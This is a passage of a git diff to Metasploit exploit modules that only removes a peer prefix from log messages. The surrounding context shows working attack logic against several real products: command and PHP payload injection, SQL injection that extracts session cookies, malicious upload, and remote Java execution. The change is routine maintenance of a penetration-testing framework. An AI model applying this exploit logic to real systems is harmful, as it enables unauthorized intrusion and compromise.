@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else - vprint_status("#{peer} - Detection failed") + vprint_status("Detection failed") return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + vprint_status("Model #{model} with version #{version}-#{build} detected") case version when '4.0' @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') # send request to append shell commands - print_status("#{peer} - Injecting the payload...") + print_status("Injecting the payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('webman', 'imageSelector.cgi'), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote end # send request to invoke the injected shell commands - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('redirect.cgi'), @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end - print_good("#{peer} - Command successfully executed") + print_good("Command successfully executed") print_line(res.body) end end diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb index e64f6b7146..0d9432b712 100644 --- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb +++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb @@ -71,13 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd @@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ - print_good("#{peer} - Command sent successfully") + print_good("Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m - print_status("#{peer} - Command output: #{$1}") + print_status("Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 2ee3d5bb07..3411f73fc1 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode("echo #{fingerprint}") data << "%26" - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode(payload.raw) data << "%26" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/WANem/result.php', @@ -100,12 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") end if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end end diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index 0aa9a24a84..af414339ba 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = target_uri.path - print_status("#{peer} - Housing php payload...") + print_status("Housing php payload...") # Allow commands to be passed as a header. # We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff. @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => post_data }) - print_status("#{peer} - Loading our payload...") + print_status("Loading our payload...") # Execute our payload send_request_raw({ diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 27ad401c98..aaa3c51f36 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{client.peerhost}:#{client.peerport}" if client.type != "meterpreter" - print_error("#{peer} - NOTE: you must use a meterpreter payload in order to automatically cleanup.") - print_error("#{peer} - The currencies.php won't be restored automatically.") + print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") + print_error("The currencies.php won't be restored automatically.") return end @@ -102,19 +102,19 @@ class Metasploit3 < Msf::Exploit::Remote currencies_php = currencies_php.gsub(/^ {6}/, '') pwd = client.fs.dir.pwd - print_status("#{peer} - Searching currencies.php file from #{pwd}") + print_status("Searching currencies.php file from #{pwd}") res = client.fs.file.search(nil, "currencies.php", true, -1) res.each do |hit| filename = "#{hit['path']}/#{hit['name']}" - print_warning("#{peer} - Restoring #{filename}") + print_warning("Restoring #{filename}") client.fs.file.rm(filename) fd = client.fs.file.new(filename, "wb") fd.write(currencies_php) fd.close end - print_status("#{peer} - Cleanup finished") + print_status("Cleanup finished") end @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote stub = "\0'));#{payload.encoded}?>" - print_status("#{peer} - Injecting the PHP payload") + print_status("Injecting the PHP payload") response = send_request_cgi({ 'uri' => normalize_uri(uri, "converter.php"), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Executing the PHP payload") + print_status("Executing the PHP payload") timeout = 0.01 response = send_request_cgi({ diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 73ae05f5fa..782c427555 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 - vprint_status("#{peer} - Zabbix version #{version} detected") + vprint_status("Zabbix version #{version} detected") else # If this fails, guest access may not be enabled - vprint_status("#{peer} - Unable to access httpmon.php") + vprint_status("Unable to access httpmon.php") return Exploit::CheckCode::Unknown end @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/ session = $1 - print_status("#{peer} - Extracted session cookie - [ #{session} ]") + print_status("Extracted session cookie - [ #{session} ]") return session else fail_with(Failure::Unknown, "#{peer} - Unable to extract a valid session") @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote @sid = "#{@session[16..-1]}" script_name = rand_text_alpha(8) # Upload script - print_status("#{peer} - Attempting to inject payload") + print_status("Attempting to inject payload") res = send_request_cgi({ 'method' => 'POST', 'cookie' => "zbx_sessionid=#{@session}", @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script added)/ - print_status("#{peer} - Payload injected successfully") + print_status("Payload injected successfully") else fail_with(Failure::Unknown, "#{peer} - Payload injection failed!") end @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup post_data = "sid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)" - print_status("#{peer} - Cleaning script remnants") + print_status("Cleaning script remnants") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -173,9 +173,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /(Script deleted)/ - print_status("#{peer} - Script removed successfully") + print_status("Script removed successfully") else - print_warning("#{peer} - Unable to remove script #{@scriptid}") + print_warning("Unable to remove script #{@scriptid}") end end end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 9a3a544ed4..1097a5e7bf 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from config file - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/config/global.conf' @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote lines = rand(100) + 1 # send payload - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") + print_status("Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ 'uri' => '/index.cgi', diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 30baf11724..3a728421f4 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/ return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Save @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote postdata = "__ac_name=#{username}&__ac_password=#{password}&daemon=#{command}" # send payload - print_status("#{peer} - Sending payload to Zenoss (#{command.length.to_s} bytes)") + print_status("Sending payload to Zenoss (#{command.length.to_s} bytes)") begin res = send_request_cgi({ 'method' => 'POST', @@ -94,14 +94,14 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "#{postdata}", }) if res and res['Bobo-Exception-Type'] =~ /^Unauthorized$/ - print_error("#{peer} - Authentication failed. Incorrect username/password.") + print_error("Authentication failed. Incorrect username/password.") return end - print_status("#{peer} - Sent payload successfully") + print_status("Sent payload successfully") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") rescue - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end handler diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 7ee164b10b..2376559d8d 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo #{clue}" connect - vprint_status("#{peer} - Sending 'Command' request...") + vprint_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable elsif res =~ /-1/ and res=~ /NODE (\d*)/ node_id = $1 - vprint_good("#{peer} - Node ID #{node_id} discovered") + vprint_good("Node ID #{node_id} discovered") else return Exploit::CheckCode::Safe end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retry with the good node_id connect - vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...") + vprint_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /#{clue}/ @@ -117,16 +117,16 @@ class Metasploit3 < Msf::Exploit::Remote cmd = payload.encoded connect - print_status("#{peer} - Sending 'Command' request...") + print_status("Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /-1/ and res=~ /NODE (\d*)/ # Retry with the good node_id node_id = $1 - print_good("#{peer} - Node ID #{node_id} discovered") + print_good("Node ID #{node_id} discovered") connect - print_status("#{peer} - Sending 'Command' request with discovered Node ID...") + print_status("Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect end @@ -134,10 +134,10 @@ class Metasploit3 < Msf::Exploit::Remote # Read command output from socket if cmd/unix/generic payload was used if (datastore['CMD']) if res and res =~ /\x30\xad/ - print_good("#{peer} - Command executed successfully") + print_good("Command executed successfully") print_status("Output:\n#{res.split("\x30\xad").last}") else - print_error("#{peer} - Failed to execute the command") + print_error("Failed to execute the command") end end diff --git a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb index 5cb602e0b1..cbfa6a463a 100644 --- a/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb +++ b/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb @@ -97,7 +97,7 @@ class Metasploit4 < Msf::Exploit::Remote rescue peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Caught #{$!.class}: #{$!.message}") + vprint_status("Caught #{$!.class}: #{$!.message}") ensure smtp_disconnect diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index d6fb488e75..685a0ae6d7 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -65,30 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to execute arbitrary Java...") + print_status("Trying to execute arbitrary Java...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else # TODO: It'd be nice to report_host() with this info. - print_good("#{peer} - Remote OS is '#{result}'") + print_good("Remote OS is '#{result}'") end jar_file = "" if result =~ /win/i - print_status("#{peer} - Discovering TEMP path") + print_status("Discovering TEMP path") res = execute(java_tmp_dir) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path identified: '#{result}'") + print_good("TEMP path identified: '#{result}'") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else @@ -102,18 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'System.getProperty("java.class.path")' - vprint_status("#{peer} - Trying to execute 'System.getProperty(\"java.version\")'...") + vprint_status("Trying to execute 'System.getProperty(\"java.version\")'...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - No results for the Java test") + vprint_status("No results for the Java test") return false elsif result =~ /elasticsearch/ - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return true else - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return false end end diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index 376acef76a..22409cadca 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -63,27 +63,27 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking vulnerability...") + print_status("Checking vulnerability...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering TEMP path...") + print_status("Discovering TEMP path...") res = execute(java_tmp_dir) tmp_dir = parse_result(res) if tmp_dir.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path on '#{tmp_dir}'") + print_good("TEMP path on '#{tmp_dir}'") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) os = parse_result(res) if os.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else - print_good("#{peer} - Remote OS is '#{os}'") + print_good("Remote OS is '#{os}'") end if os =~ /win/i @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(tmp_file) - print_status("#{peer} - Trying to load metasploit payload...") + print_status("Trying to load metasploit payload...") java = java_load_class(os, tmp_file) execute(java) end @@ -102,12 +102,12 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'java.lang.Math.class.forName("java.lang.Runtime")' - vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...") + vprint_status("Trying to get a reference to java.lang.Runtime...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - no response to test") + vprint_status("no response to test") return false elsif result == 'class java.lang.Runtime' return true @@ -118,12 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_result(res) unless res - vprint_error("#{peer} - No response") + vprint_error("No response") return nil end unless res.code == 200 && res.body - vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") + vprint_error("Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") return nil end diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index eae0dc278f..5899e09be6 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_status("#{peer} - The server returned: #{res.code} #{res.message}") + print_status("The server returned: #{res.code} #{res.message}") m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || '' if m.empty? - print_error("#{peer} - This server may not be vulnerable") + print_error("This server may not be vulnerable") else - print_status("#{peer} - Command output from the server:") + print_status("Command output from the server:") print_line(m) end end diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 6b2f6d616e..a7a8dbd4f9 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--o0oOo0o\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"), @@ -96,11 +96,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end end diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index b7017589ee..645a337f93 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = data.to_s - print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...") + print_status("Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), @@ -86,14 +86,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res - print_error("#{peer} - No response from host") + print_error("No response from host") return end - print_status("#{peer} - Requesting '#{php_fname}'...") + print_status("Requesting '#{php_fname}'...") res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) if res and res.code == 404 - print_error("#{peer} - Upload unsuccessful: #{res.code.to_s}") + print_error("Upload unsuccessful: #{res.code.to_s}") return end diff --git a/modules/exploits/multi/http/bolt_file_upload.rb b/modules/exploits/multi/http/bolt_file_upload.rb index ec8b0b4797..30b5987cb4 100644 --- a/modules/exploits/multi/http/bolt_file_upload.rb +++ b/modules/exploits/multi/http/bolt_file_upload.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies - vprint_status("#{peer} - Logging in...") + vprint_status("Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login'), @@ -130,17 +130,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - vprint_status("#{peer} - Authenticating using #{username}:#{password}") + vprint_status("Authenticating using #{username}:#{password}") cookie = bolt_login(username, password) fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil? - vprint_good("#{peer} - Authenticated with Bolt.") + vprint_good("Authenticated with Bolt.") token = get_token(cookie, fname) fail_with(Failure::Unknown, 'No token found.') if token.nil? - vprint_good("#{peer} - Token \"#{token}\" found.") + vprint_good("Token \"#{token}\" found.") - vprint_status("#{peer} - Preparing payload...") + vprint_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha_lower(10) data = Rex::MIME::Message.new @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"') post_data = data.to_s - vprint_status("#{peer} - Uploading payload...") + vprint_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), @@ -158,17 +158,17 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302 - vprint_good("#{peer} - Uploaded the payload.") + vprint_good("Uploaded the payload.") rename = rename_payload(cookie, payload_name, fname) fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil? php_file_name = "#{payload_name}.php" payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name) - vprint_status("#{peer} - Parsed response.") + vprint_status("Parsed response.") register_files_for_cleanup(php_file_name) - vprint_status("#{peer} - Executing the payload at #{payload_url}.") + vprint_status("Executing the payload at #{payload_url}.") send_request_cgi( 'uri' => payload_url, 'method' => 'GET' diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index 03028e468b..b3b854cee9 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -66,7 +66,7 @@ class Metasploit4 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") http_send_command(payload.raw) end end diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index a0c6b0f4c6..348dea375a 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote war_filename = "#{app_base}.war" war_location = target['AutoDeployPath'] - print_status("#{peer} - Uploading WAR file #{war_filename}...") + print_status("Uploading WAR file #{war_filename}...") res = upload_file(war_location, war_filename, war) if res @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index bdeb327d67..758cbcf46e 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - vprint_good "#{peer} - Administrator access available" + vprint_good "Administrator access available" else return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote imghash = "596b3fc4f1a0b818979db1cf94a82220" if img == imghash - vprint_good "#{peer} - ColdFusion 9 Detected" + vprint_good "ColdFusion 9 Detected" else return Exploit::CheckCode::Safe end @@ -192,8 +192,8 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload uri = target_uri.path - print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") - print_status("#{peer} - Executing payload...") + print_status("Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', @@ -207,7 +207,7 @@ class Metasploit3 < Msf::Exploit::Remote @filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea - print_status "#{peer} - Trying to upload payload via scheduled task..." + print_status "Trying to upload payload via scheduled task..." res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'), @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - print_good("#{peer} - Logged in as Administrator!") + print_good("Logged in as Administrator!") else fail_with(Failure::Unknown, "#{peer} - Login Failed") end @@ -259,12 +259,12 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/ file_path = $1 - print_good("#{peer} - File path disclosed! #{file_path}") + print_good("File path disclosed! #{file_path}") else fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath") end - print_status("#{peer} - Adding scheduled task") + print_status("Adding scheduled task") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'), @@ -287,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Running scheduled task") + print_status("Running scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -299,12 +299,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/ - print_good("#{peer} - Scheduled task completed successfully") + print_good("Scheduled task completed successfully") else fail_with(Failure::Unknown, "#{peer} - Scheduled task failed") end - print_status("#{peer} - Deleting scheduled task") + print_status("Deleting scheduled task") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'), @@ -316,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!") + print_error("Scheduled task deletion failed, cleanup might be needed!") end end end diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 399846da49..81897bc3e0 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -88,21 +88,21 @@ class Metasploit4 < Msf::Exploit::Remote printer_name = rand_text_alphanumeric(10 + rand(5)) res = add_printer(printer_name, '') if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/ - vprint_status("#{peer} - Found CUPS version #{$1}") + vprint_status("Found CUPS version #{$1}") else - print_status("#{peer} - Target is not a CUPS web server") + print_status("Target is not a CUPS web server") return Exploit::CheckCode::Safe end if res.body =~ /Set Default Options for #{printer_name}/ - vprint_good("#{peer} - Added printer successfully") + vprint_good("Added printer successfully") delete_printer(printer_name) elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") elsif res.code == 426 - vprint_error("#{peer} - SSL required - 